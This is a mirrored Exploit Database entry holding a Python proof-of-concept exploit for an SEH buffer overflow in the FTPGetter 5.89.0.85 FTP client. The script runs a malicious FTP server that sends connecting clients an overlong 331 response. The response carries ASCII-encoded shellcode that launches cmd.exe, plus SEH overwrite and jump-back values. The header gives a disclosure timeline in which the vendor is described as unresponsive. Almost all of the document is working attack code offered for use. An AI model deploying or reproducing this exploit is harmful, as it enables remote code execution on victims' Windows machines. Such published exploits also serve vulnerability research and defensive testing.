FTPGetter 5.89.0.85 – Remote Buffer Overflow (SEH)

• Exploit Database
• 14 阅读

• 作者： Paul Purcell
  日期： 2017-07-14
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42328/

• #!/usr/bin/python
  
  # Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow
  # Date: 07/14/2017
  # Exploit Author: Paul Purcell
  # Contact: ptpxploit at gmail
  # Vendor Homepage: https://www.ftpgetter.com/
  # Vulnerable Version Download: Available for 30 days here: (https://ufile.io/2celn) I can upload again upon request
  # Version: FTPGetter 5.89.0.85 (also works on earlier versions)
  # Tested on: Windows 10 Pro 1703 x64
  # Youtube Demonstration of Exploit: https://www.youtube.com/watch?v=AuAiQwGP-ww
  # Category: Remote Code Execution
  #
  # Timeline: 05/25/16 Bug found
  # 05/31/16 Vender notified - no response
  # 07/15/16 Vender notified - no response
  # -------- Vender notified multiple times over a year, no response.
  # 07/14/17 Exploit Published
  #
  # Summary:There is a buffer overflow in the log viewer/parser of FTPGetter.When a malicious ftp server returns a long
  # 331 response, the overflow overwrites SEH produced is exploitable.There are many bad characters, so I had to ascii encode everything.
  # My PoC runs code to launch a command shell.Also note the time of day is displayed in the log viewer, which will
  # change the length of the buffer needed.Just adjust your sled accordingly.
   
  from socket import *
  
  #ascii encoded launch cmd.exe
  buf =""
  buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
  buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
  buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
  buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
  buf += "\x4b\x4c\x6b\x58\x4f\x72\x67\x70\x43\x30\x55\x50\x33"
  buf += "\x50\x4f\x79\x4a\x45\x44\x71\x4f\x30\x71\x74\x6c\x4b"
  buf += "\x70\x50\x34\x70\x4e\x6b\x61\x42\x54\x4c\x4c\x4b\x42"
  buf += "\x72\x47\x64\x4e\x6b\x64\x32\x44\x68\x36\x6f\x4c\x77"
  buf += "\x42\x6a\x46\x46\x30\x31\x4b\x4f\x4c\x6c\x57\x4c\x31"
  buf += "\x71\x63\x4c\x44\x42\x64\x6c\x35\x70\x7a\x61\x38\x4f"
  buf += "\x56\x6d\x55\x51\x6f\x37\x38\x62\x4c\x32\x61\x42\x52"
  buf += "\x77\x4c\x4b\x51\x42\x32\x30\x6e\x6b\x50\x4a\x77\x4c"
  buf += "\x4e\x6b\x42\x6c\x34\x51\x44\x38\x68\x63\x32\x68\x66"
  buf += "\x61\x58\x51\x62\x71\x6c\x4b\x76\x39\x35\x70\x35\x51"
  buf += "\x49\x43\x4e\x6b\x37\x39\x67\x68\x68\x63\x55\x6a\x72"
  buf += "\x69\x4c\x4b\x64\x74\x4e\x6b\x65\x51\x5a\x76\x35\x61"
  buf += "\x69\x6f\x4c\x6c\x6b\x71\x78\x4f\x54\x4d\x57\x71\x39"
  buf += "\x57\x46\x58\x79\x70\x51\x65\x4c\x36\x67\x73\x51\x6d"
  buf += "\x38\x78\x67\x4b\x73\x4d\x64\x64\x32\x55\x39\x74\x56"
  buf += "\x38\x4c\x4b\x62\x78\x54\x64\x37\x71\x79\x43\x75\x36"
  buf += "\x4e\x6b\x46\x6c\x42\x6b\x4e\x6b\x56\x38\x47\x6c\x46"
  buf += "\x61\x5a\x73\x6c\x4b\x45\x54\x4c\x4b\x33\x31\x48\x50"
  buf += "\x4c\x49\x73\x74\x44\x64\x44\x64\x33\x6b\x53\x6b\x50"
  buf += "\x61\x73\x69\x63\x6a\x62\x71\x59\x6f\x6b\x50\x53\x6f"
  buf += "\x51\x4f\x32\x7a\x4e\x6b\x72\x32\x7a\x4b\x4e\x6d\x31"
  buf += "\x4d\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x38\x32\x67\x70"
  buf += "\x63\x30\x53\x30\x66\x30\x75\x38\x36\x51\x6e\x6b\x52"
  buf += "\x4f\x4f\x77\x39\x6f\x4b\x65\x4d\x6b\x6a\x50\x4f\x45"
  buf += "\x4f\x52\x30\x56\x42\x48\x6e\x46\x6f\x65\x6f\x4d\x6d"
  buf += "\x4d\x49\x6f\x7a\x75\x45\x6c\x73\x36\x51\x6c\x37\x7a"
  buf += "\x4b\x30\x39\x6b\x39\x70\x30\x75\x76\x65\x6d\x6b\x72"
  buf += "\x67\x32\x33\x52\x52\x62\x4f\x51\x7a\x75\x50\x76\x33"
  buf += "\x79\x6f\x4b\x65\x55\x33\x62\x4d\x72\x44\x34\x6e\x53"
  buf += "\x55\x43\x48\x61\x75\x57\x70\x41\x41"
  
  #All the normal ways to jump back to code I control code were bad characters, so again had to ascii encode
  jmpback =""
  jmpback += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
  jmpback += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
  jmpback += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
  jmpback += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
  jmpback += "\x4e\x6d\x4d\x6e\x46\x70\x49\x6e\x6b\x4f\x4b\x4f\x49"
  jmpback += "\x6f\x6a\x47\x41\x41"
  
  host = "0.0.0.0"
  port = 21
  
  sled="NjoyUrShell!"
  fill="\x41"*(480-len(buf))
  nseh="\x74\x06\x90\x90"
  seh="\xad\x11\x4d\x00"
  prepesi="\x58\x58\x58\x8d\x70\x10\x90\x90"
  jnk="B"*400
  sploit=(sled+buf+fill+nseh+seh+prepesi+jmpback+jnk)
  sock = socket(AF_INET, SOCK_STREAM)
  sock.bind((host, 21))
  sock.listen(1)
  
  
  print "Anti-FtpGetter FTP Server Started!"
  print "Ready to pwn on port %d..." % port
   
  connect, hostip = sock.accept()
  print "Connection accepted from %s" % hostip[0]
  connect.send("220 Welcome to pwnServ, Serving sploit in 3..2..1..\r\n")
  connect.recv(64)# Receive USER
  print "Sending EViL 331 response"
  connect.send("331 "+sploit+"\r\n")
  print "Here, have a handy dandy command shell!"
  connect.close()
  sock.close()